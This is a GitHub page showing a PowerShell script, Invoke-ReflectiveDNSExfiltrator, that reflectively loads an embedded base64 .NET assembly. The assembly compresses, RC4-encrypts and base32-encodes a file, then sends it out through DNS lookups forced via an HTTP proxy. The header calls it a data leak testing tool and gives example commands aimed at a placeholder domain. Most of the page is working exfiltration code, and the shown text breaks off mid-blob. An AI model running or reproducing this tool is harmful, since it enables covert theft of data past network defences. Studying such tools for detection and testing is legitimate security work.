-
Notifications
You must be signed in to change notification settings - Fork 10
/
Copy pathInvoke-ReflectiveDNSExfiltrator.ps1
97 lines (76 loc) · 18.5 KB
/
Invoke-ReflectiveDNSExfiltrator.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
function Invoke-ReflectiveDNSExfiltrator
{
<#
.AUTHOR Arno0x0x, Twitter: @Arno0x0x
.SYNOPSIS
Invoke-ReflectiveDNSExfiltrator allows for transfering (exfiltrate) a file over a DNS resolution covert channel.
This is basically a data leak testing tool allowing to exfiltrate some data over a covert channel.
This tool addresses the specific case when the source computer from which you need/want to exfiltrate data cannot perform
DNS resolution of external domain name (which is normally required in order to use the DNS resolution covert channel).
The solution in this case is to use a third party device exposing a service which will have to resolve a domain name on behalf
of the source computer. The perfect, and most basic example, is to use a HTTP proxy server and feed it with some HEAD requests
for all the external domain names. It does not matter whether or not the HEAD request gets a proper HTTP response, we really don't care,
as long as the proxy first has to resolve the domain name, hence allowing for data exfiltration.
It requires the server side counterpart coded in Python: reflectiveDnsExfiltrator.py.
.EXAMPLE
# Default usage, no options:
PS C:\> Invoke-ReflectiveDNSExfiltrator -i anyFile -d mydomain.com -p password -s proxyName:proxyPort
# Setting a 500ms throttling time
PS C:\> Invoke-ReflectiveDNSExfiltrator -i anyFile -d mydomain.com -p password -s proxyName:proxyPort -t 500
# Limiting the DNS request size to a maximum of 150 bytes
PS C:\> Invoke-ReflectiveDNSExfiltrator -i anyFile -d mydomain.com -p password -s proxyName:proxyPort -r 150
# Limiting the label size to a maximum of 40 characters
PS C:\> Invoke-ReflectiveDNSExfiltrator -i anyFile -d mydomain.com -p password -s proxyName:proxyPort -l 40
#>
[CmdletBinding()]
Param (
[Parameter(Mandatory = $True)]
[Alias('i')]
[ValidateNotNullOrEmpty()]
[String]$InputFile,
[Parameter(Mandatory = $True)]
[Alias('d')]
[ValidateNotNullOrEmpty()]
[String]$DomainName,
[Parameter(Mandatory = $True)]
[Alias('p')]
[ValidateNotNullOrEmpty()]
[String]$Password,
[Parameter(Mandatory = $True)]
[Alias('s')]
[ValidateNotNullOrEmpty()]
[String]$ProxyServer,
[Parameter(Mandatory = $False)]
[Alias('t')]
[ValidateNotNullOrEmpty()]
[int]$ThrottleTime,
[Parameter(Mandatory = $False)]
[Alias('r')]
[ValidateNotNullOrEmpty()]
[int]$RequestMaxSize,
[Parameter(Mandatory = $False)]
[Alias('l')]
[ValidateNotNullOrEmpty()]
[int]$LabelMaxSize
)
# Load the DNSExfiltrator assembly
$DNSExfiltratorLib = [System.Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALQPVloAAAAAAAAAAOAAAiELAQsAACYAAAAGAAAAAAAA3kQAAAAgAAAAYAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACgAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAIxEAABPAAAAAGAAAOgCAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA5CQAAAAgAAAAJgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAOgCAAAAYAAAAAQAAAAoAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAIAAAAACAAAALAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADARAAAAAAAAEgAAAACAAUA3CoAALAZAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACoCKAQAAAoAAAAqAAMwAgBvAAAAAAAAAAByAQAAcCgFAAAKAHIPAABwKAYAAApvBwAACigIAAAKAHLWAABwKAUAAAoAcjYBAHAoBQAACgByuwEAcCgFAAAKAHJiAgBwKAUAAAoAclUDAHAoBQAACgByAgQAcCgFAAAKAHLLBABwKAUAAAoAKgATMAIAaQAAAAEAABEAAnKyBQBwbwkAAAoW/gEKBi0MAB8MKAoAAAoAACs6AnK6BQBwbwkAAAoW/gEKBi0MAB8KKAoAAAoAACscAnLCBQBwbwkAAAoW/gEKBi0KAB8JKAoAAAoAAAIoBQAACgAfDygKAAAKACoAAAATMAMAGwAAAAIAABEAAigNAAAGcsoFAHByzgUAcG8LAAAKCisABioAEzAEABsAAAADAAARAAMXjQoAAAEKBhYffJ0GbwwAAAooBgAABgAqAAUAAAAGAAAABwAAABswBwAMBgAABAAAEQB+DQAACgp+DQAACgt+DQAACgx+DQAACg0gOAwAABMEfg0AAAoTBRYTBn4NAAAKEwd+DQAAChMIIP8AAAATCR8/EwoCjmka/gQW/gETIBEgLRcActAFAHAoAwAABgAoAgAABgA4oQUAAAIZmh86bw4AAAoV/gEW/gETIBEgLRcAcvwFAHAoAwAABgAoAgAABgA4dAUAAAIWmgoCF5oLAhiaDAIZmheNCgAAARMhESEWHzqdESFvDAAAChaaDQIZmheNCgAAARMhESEWHzqdESFvDAAACheaKA8AAAoTBAYoEAAAChMFBigRAAAKEyARIC0XAHI+BgBwBigSAAAKKAMAAAYAOAEFAAAZjQ4AAAEl0AUAAAQoFAAACgKOaSgBAAArFv4BEyARIDpMAQAAABoTCzgyAQAAAAIRC5pybgYAcG8JAAAKFv4BEyARIC1AAAIRC5oXjQoAAAETIREhFh89nREhbwwAAAoXmigPAAAKEwZydAYAcBEGjA4AAAEoEgAACigDAAAGAAA40wAAAAIRC5pywAYAcG8JAAAKFv4BEyARIC1VAAIRC5oXjQoAAAETIREhFh89nREhbwwAAAoXmigPAAAKEwwRDCD/AAAA/gQW/gETIBEgLQYAEQwTCQByxgYAcBEJjA4AAAEoEgAACigDAAAGAAArZwIRC5pyJgcAcG8JAAAKFv4BEyARIC1QAAIRC5oXjQoAAAETIREhFh89nREhbwwAAAoXmigPAAAKEwwRDB8//gQW/gETIBEgLQYAEQwTCgByLAcAcBEKjA4AAAEoEgAACigDAAAGAAARCxdYEwsAEQsCjmn+BBMgESA6vv7//wBygAcAcAYoEgAACigDAAAGAHMWAAAKEw0AEQ0XF3MXAAAKEw4AEQ4RBW8YAAAKEw8RD28ZAAAKExAREHMaAAAKExEAEREGKBsAAApvHAAACgAA3hQRERT+ARMgESAtCBERbx0AAAoA3ADeFBEQFP4BEyARIC0IERBvHQAACgDcAADeFBEOFP4BEyARIC0IEQ5vHQAACgDcABENFmoWbx4AAAomct4HAHAIKBIAAAooAwAABgAoHwAACghvIAAAChENbyEAAAooBwAABigEAAAGEwdynQgAcBEHbyIAAAqMDgAAASgSAAAKKAMAAAYAAN4UEQ0U/gETIBEgLQgRDW8dAAAKANwAEQkfClkHbyIAAAoYWFkTEhESEQoXWFsTExESEQoXWF0XWRMUERMRCloRFFgTFREHbyIAAAoRFVsXWBMWcgkJAHARFYwOAAABKBIAAAooAwAABgByoAkAcBEWjA4AAAEoEgAACigDAAAGABuNCAAAARMiESIWctgJAHCiESIXKB8AAApyEgoAcBEFERaMDgAAASgjAAAKbyAAAAooBAAABqIRIhhyIgoAcKIRIhkHohEiGnImCgBwohEiKCQAAAoTCCgfAAAKEQhvIAAAChMXAHIwCgBwKAMAAAYACREEcyUAAAoTGBEYbyYAAAoTGREZERcWEReOaW8nAAAKABEZERcWEReOaW8oAAAKExoRGW8pAAAKABEYbyoAAAoAAN4fExsAcmYKAHARG28rAAAKKBIAAAooAwAABgDdSwEAAABytgoAcCgDAAAGAH4NAAAKExwWEx0WEws4DgEAAAARBxELERURB28iAAAKEQtZKCwAAApvLQAAChMcERxvIgAAChMect4KAHASHSguAAAKciIKAHAoLwAAChMIFhMfKzEAEQgRHBEfEQpaEQoRHhEfEQpaWSgsAAAKby0AAApyIgoAcCgvAAAKEwgRHxdYEx8AER8RCloRHv4EEyARIC3AEQgHciYKAHAoLwAAChMIKB8AAAoRCG8gAAAKExcACREEcyUAAAoTGBEYbyYAAAoTGREZERcWEReOaW8nAAAKABEYbyoAAAoAAN4cExsAcmYKAHARG28rAAAKKBIAAAooAwAABgDeQwARCxEVWBMLER0XWBMdEQYW/gETIBEgLQoAEQYoMAAACgAAABELEQdvIgAACv4EEyARIDre/v//cg4LAHAoAwAABgAAKgFMAAACALwCEs4CFAAAAAACALMCMuUCFAAAAAACAJ4CX/0CFAAAAAACAJIC2WsDFAAAAAAAAE8EUaAEHyMAAAEAAH0FLqsFHCMAAAETMAIAEgAAAAUAABEAAgMoCQAABigCAAArCisABioAABMwAQAHAAAABgAAEQLSCisABioAEzAEAHMAAAAHAAARABYgAAEAACgyAAAKfgEAAAQtExT+BgwAAAZzMwAACoABAAAEKwB+AQAABCgDAAArKAIAACsKFgsWDCsj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DQIpAWkAoABBANUFWwIpAd8FYAIJABUFtQAIAAgAUgAIAAwAVwAOABAAXwAhAJsA/gAuAAsAdAIuABMAfQJDABsAqgCjAJsA/gDjAJsA/gCAAZsA/gABAAwAAAAGAMoA1ADfAKEB5AH3ATECUQJnAgUCRAKgIQAABQAEgAAAAAAAAAAAAAAAAAAAAACgAQAABAAAAAAAAAAAAAAAAQBSAAAAAAAEAAAAAAAAAAAAAAABAJYDAAAAAAQAAAAAAAAAAAAAAAEAzwMAAAAABAAAAAAAAAAAAAAAAQBbAAAAAAAGAAUABwADACsAHAFjAOABaQAsAmkATAIAAAAAADxNb2R1bGU+AHJlZmxlY3RpdmVEbnNFeGZpbHRyYXRvci5kbGwAUmVmbGVjdGl2ZURuc0V4ZmlsdHJhdG9yAFJDNEVuY3J5cHQAQmFzZTMyAG1zY29ybGliAFN5c3RlbQBPYmplY3QALmN0b3IAUHJpbnRVc2FnZQBQcmludENvbG9yAEVuY29kZQBHb0ZpZ2h0AE1haW4ARW5jcnlwdABFbmNyeXB0SW5pdGFsaXplAFN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljAElFbnVtZXJhYmxlYDEARW5jcnlwdE91dHB1dABTd2FwAEluQnl0ZVNpemUAT3V0Qnl0ZVNpemUAQmFzZTMyQWxwaGFiZXQAVG9CYXNlMzJTdHJpbmcAdGV4dABkYXRhAGFyZ3MAa2V5AHMAaQBqAGJ5dGVzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQByZWZsZWN0aXZlRG5zRXhmaWx0cmF0b3IAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAENvbVZpc2libGVBdHRyaWJ1dGUAQ29uc29sZQBXcml0ZUxpbmUAQXBwRG9tYWluAGdldF9DdXJyZW50RG9tYWluAGdldF9GcmllbmRseU5hbWUAU3RyaW5nAFN0YXJ0c1dpdGgAQ29uc29sZUNvbG9yAHNldF9Gb3JlZ3JvdW5kQ29sb3IAUmVwbGFjZQBDaGFyAFNwbGl0AEVtcHR5AEluZGV4T2YAQ29udmVydABUb0ludDMyAFN5c3RlbS5JTwBQYXRoAEdldEZpbGVOYW1lAEZpbGUARXhpc3RzAEZvcm1hdABJbnQzMgA8UHJpdmF0ZUltcGxlbWVudGF0aW9uRGV0YWlscz57RDZBODIxNjEtQkQ4Qy00QzZELUJEQUMtNjM5OTQyREU1REY5fQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBWYWx1ZVR5cGUAX19TdGF0aWNBcnJheUluaXRUeXBlU2l6ZT0xMgAkJG1ldGhvZDB4NjAwMDAwNi0xAFJ1bnRpbWVIZWxwZXJzAEFycmF5AFJ1bnRpbWVGaWVsZEhhbmRsZQBJbml0aWFsaXplQXJyYXkAU3lzdGVtLkNvcmUAU3lzdGVtLkxpbnEARW51bWVyYWJsZQBDb250YWlucwBNZW1vcnlTdHJlYW0AU3lzdGVtLklPLkNvbXByZXNzaW9uAFppcEFyY2hpdmUAU3RyZWFtAFppcEFyY2hpdmVNb2RlAFppcEFyY2hpdmVFbnRyeQBDcmVhdGVFbnRyeQBPcGVuAEJpbmFyeVdyaXRlcgBSZWFkQWxsQnl0ZXMAV3JpdGUASURpc3Bvc2FibGUARGlzcG9zZQBTZWVrT3JpZ2luAFNlZWsAU3lzdGVtLlRleHQARW5jb2RpbmcAZ2V0X1VURjgAR2V0Qnl0ZXMAVG9BcnJheQBnZXRfTGVuZ3RoAENvbmNhdABTeXN0ZW0uTmV0LlNvY2tldHMAVGNwQ2xpZW50AE5ldHdvcmtTdHJlYW0AR2V0U3RyZWFtAFJlYWQAQ2xvc2UARXhjZXB0aW9uAGdldF9NZXNzYWdlAE1hdGgATWluAFN1YnN0cmluZwBUb1N0cmluZwBTeXN0ZW0uVGhyZWFkaW5nAFRocmVhZABTbGVlcABTb2NrZXRFeGNlcHRpb24APEVuY3J5cHRJbml0YWxpemU+Yl9fMABGdW5jYDIAQ1MkPD45X19DYWNoZWRBbm9ueW1vdXNNZXRob2REZWxlZ2F0ZTEAUmFuZ2UAU2VsZWN0ADw+Y19fRGlzcGxheUNsYXNzMwA8RW5jcnlwdE91dHB1dD5iX18yAGIAU3RyaW5nQnVpbGRlcgBnZXRfQ2hhcnMAQXBwZW5kAAAAAA1VAHMAYQBnAGUAOgAAgMV7ADAAfQAgADwAZgBpAGwAZQA+ACAAPABkAG8AbQBhAGkAbgBOAGEAbQBlAD4AIAA8AHAAYQBzAHMAdwBvAHIAZAA+ACAAPAB3AGUAYgBQAHIAbwB4AHkAPgAgAFsAdAA9AHQAaAByAG8AdAB0AGwAZQBUAGkAbQBlAF0AIABbAHIAPQByAGUAcQB1AGUAcwB0AE0AYQB4AFMAaQB6AGUAXQAgAFsAbAA9AGwAYQBiAGUAbABNAGEAeABTAGkAegBlAF0AAF8JAGYAaQBsAGUAOgAJAAkAWwBNAEEATgBEAEEAVABPAFIAWQBdACAAVABoAGUAIABmAGkAbABlACAAdABvACAAYgBlACAAZQB4AGYAaQBsAHQAcgBhAHQAZQBkAC4AAICDCQBkAG8AbQBhAGkAbgBOAGEAbQBlADoACQBbAE0AQQBOAEQAQQBUAE8AUgBZAF0AIABUAGgAZQAgAGQAbwBtAGEAaQBuACAAbgBhAG0AZQAgAHQAbwAgAHUAcwBlACAAZgBvAHIAIABEAE4AUwAgAHIAZQBxAHUAZQBzAHQAcwAuAACApQkAcABhAHMAcwB3AG8AcgBkADoACQBbAE0AQQBOAEQAQQBUAE8AUgBZAF0AIABQAGEAcwBzAHcAbwByAGQAIAB0AG8AIAB1AHMAZQBkACAAZgBvAHIAIABlAG4AYwByAHkAcAB0AGkAbgBnACAAdABoAGUAIABkAGEAdABhACAAdABvACAAYgBlACAAZQB4AGYAaQBsAHQAcgBhAHQAZQBkAC4AAIDxCQB3AGUAYgBQAHIAbwB4AHkAOgAJAFsATQBBAE4ARABBAFQATwBSAFkAXQAgAFQAaABlACAAcAByAG8AeAB5ACAAcwBlAHIAdgBlAHIAIAB0AG8AIAB1AHMAZQAgAGEAcwAgAGEAIAByAGUAZgBsAGUAYwB0AGkAdgBlACAARABOAFMAIAByAGUAcwBvAGwAdQB0AGkAbwBuACAAaABvAHMAdAAsACAAaQBuACAAdABoAGUAIABmAG8AcgBtACAAPABwAHIAbwB4AHkAQQBkAGQAZQBzAHMAOgBwAHIAbwB4AHkAUABvAHIAdAA+AC4AAICrCQB0AGgAcgBvAHQAdABsAGUAVABpAG0AZQA6AAkAWwBPAFAAVABJAE8ATgBOAEEATABdACAAVABoAGUAIAB0AGkAbQBlACAAaQBuACAAbQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAB0AG8AIAB3AGEAaQB0ACAAYgBlAHQAdwBlAGUAbgAgAGUAYQBjAGgAIABEAE4AUwAgAHIAZQBxAHUAZQBzAHQALgAAgMcJAHIAZQBxAHUAZQBzAHQATQBhAHgAUwBpAHoAZQA6AAkAWwBPAFAAVABJAE8ATgBOAEEATABdACAAVABoAGUAIABtAGEAeABpAG0AdQBtACAAcwBpAHoAZQAgAGkAbgAgAGIAeQB0AGUAcwAgAGYAbwByACAAZQBhAGMAaAAgAEQATgBTACAAcgBlAHEAdQBlAHMAdAAuACAARABlAGYAYQB1AGwAdABzACAAdABvACAAMgA1ADUAIABiAHkAdABlAHMALgAAgOUJAGwAYQBiAGUAbABNAGEAeABTAGkAegBlADoACQBbAE8AUABUAEkATwBOAE4AQQBMAF0AIABUAGgAZQAgAG0AYQB4AGkAbQB1AG0AIABzAGkAegBlACAAaQBuACAAYwBoAGEAcgBzACAAZgBvAHIAIABlAGEAYwBoACAARABOAFMAIAByAGUAcQB1AGUAcwB0ACAAbABhAGIAZQBsACAAKABzAHUAYgBkAG8AbQBhAGkAbgApAC4AIABEAGUAZgBhAHUAbAB0AHMAIAB0AG8AIAA2ADMAIABjAGgAYQByAHMALgAAB1sAIQBdAAAHWwArAF0AAAdbACoAXQAAAz0AAAEAK1sAIQBdACAATQBpAHMAcwBpAG4AZwAgAGEAcgBnAHUAbQBlAG4AdABzAABBWwAhAF0AIABXAGUAYgAgAHAAcgBvAHgAeQAgAGEAcgBnAHUAbQBlAG4AdAAgAG0AYQBsAGYAbwByAG0AZQBkAAAvWwAhAF0AIABGAGkAbABlACAAbgBvAHQAIABmAG8AdQBuAGQAOgAgAHsAMAB9AAAFdAA9AABLWwAqAF0AIABTAGUAdAB0AGkAbgBnACAAdABoAHIAbwB0AHQAbABlACAAdABpAG0AZQAgAHQAbwAgAFsAewAwAH0AXQAgAG0AcwAABXIAPQAAX1sAKgBdACAAUwBlAHQAdABpAG4AZwAgAEQATgBTACAAcgBlAHEAdQBlAHMAdAAgAG0AYQB4ACAAcwBpAHoAZQAgAHQAbwAgAFsAewAwAH0AXQAgAGIAeQB0AGUAcwAABWwAPQAAU1sAKgBdACAAUwBlAHQAdABpAG4AZwAgAGwAYQBiAGUAbAAgAG0AYQB4ACAAcwBpAHoAZQAgAHQAbwAgAFsAewAwAH0AXQAgAGMAaABhAHIAcwAAXVsAKgBdACAAQwBvAG0AcAByAGUAcwBzAGkAbgBnACAAKABaAEkAUAApACAAdABoAGUAIABbAHsAMAB9AF0AIABmAGkAbABlACAAaQBuACAAbQBlAG0AbwByAHkAAIC9WwAqAF0AIABFAG4AYwByAHkAcAB0AGkAbgBnACAAdABoAGUAIABaAEkAUAAgAGYAaQBsAGUAIAB3AGkAdABoACAAcABhAHMAcwB3AG8AcgBkACAAWwB7ADAAfQBdACwAIAB0AGgAZQBuACAAYwBvAG4AdgBlAHIAdABpAG4AZwAgAGkAdAAgAHQAbwAgAGEAIABiAGEAcwBlADMAMgAgAHIAZQBwAHIAZQBzAGUAbgB0AGEAdABpAG8AbgAAa1sAKgBdACAAVABvAHQAYQBsACAAcwBpAHoAZQAgAG8AZgAgAGQAYQB0AGEAIAB0AG8AIABiAGUAIAB0AHIAYQBuAHMAbQBpAHQAdABlAGQAOgAgAFsAewAwAH0AXQAgAGIAeQB0AGUAcwAAgJVbACsAXQAgAE0AYQB4AGkAbQB1AG0AIABkAGEAdABhACAAZQB4AGYAaQBsAHQAcgBhAHQAZQBkACAAcABlAHIAIABEAE4AUwAgAHIAZQBxAHUAZQBzAHQAIAAoAGMAaAB1AG4AawAgAG0AYQB4ACAAcwBpAHoAZQApADoAIABbAHsAMAB9AF0AIABiAHkAdABlAHMAADdbACsAXQAgAE4AdQBtAGIAZQByACAAbwBmACAAYwBoAHUAbgBrAHMAOgAgAFsAewAwAH0AXQAAOUgARQBBAEQAIAAvACAASABUAFQAUAAvADEALgAwAA0ACgBIAG8AcwB0ADoAIABpAG4AaQB0AC4AAA97ADAAfQB8AHsAMQB9AAADLgAACQ0ACgANAAoAADVbACoAXQAgAFMAZQBuAGQAaQBuAGcAIAAnAGkAbgBpAHQAJwAgAHIAZQBxAHUAZQBzAHQAAU9bACEAXQAgAFUAbgBlAHgAcABlAGMAdABlAGQAIABlAHgAYwBlAHAAdABpAG8AbgAgAG8AYwBjAHUAcgBlAGQAOgAgAFsAewAw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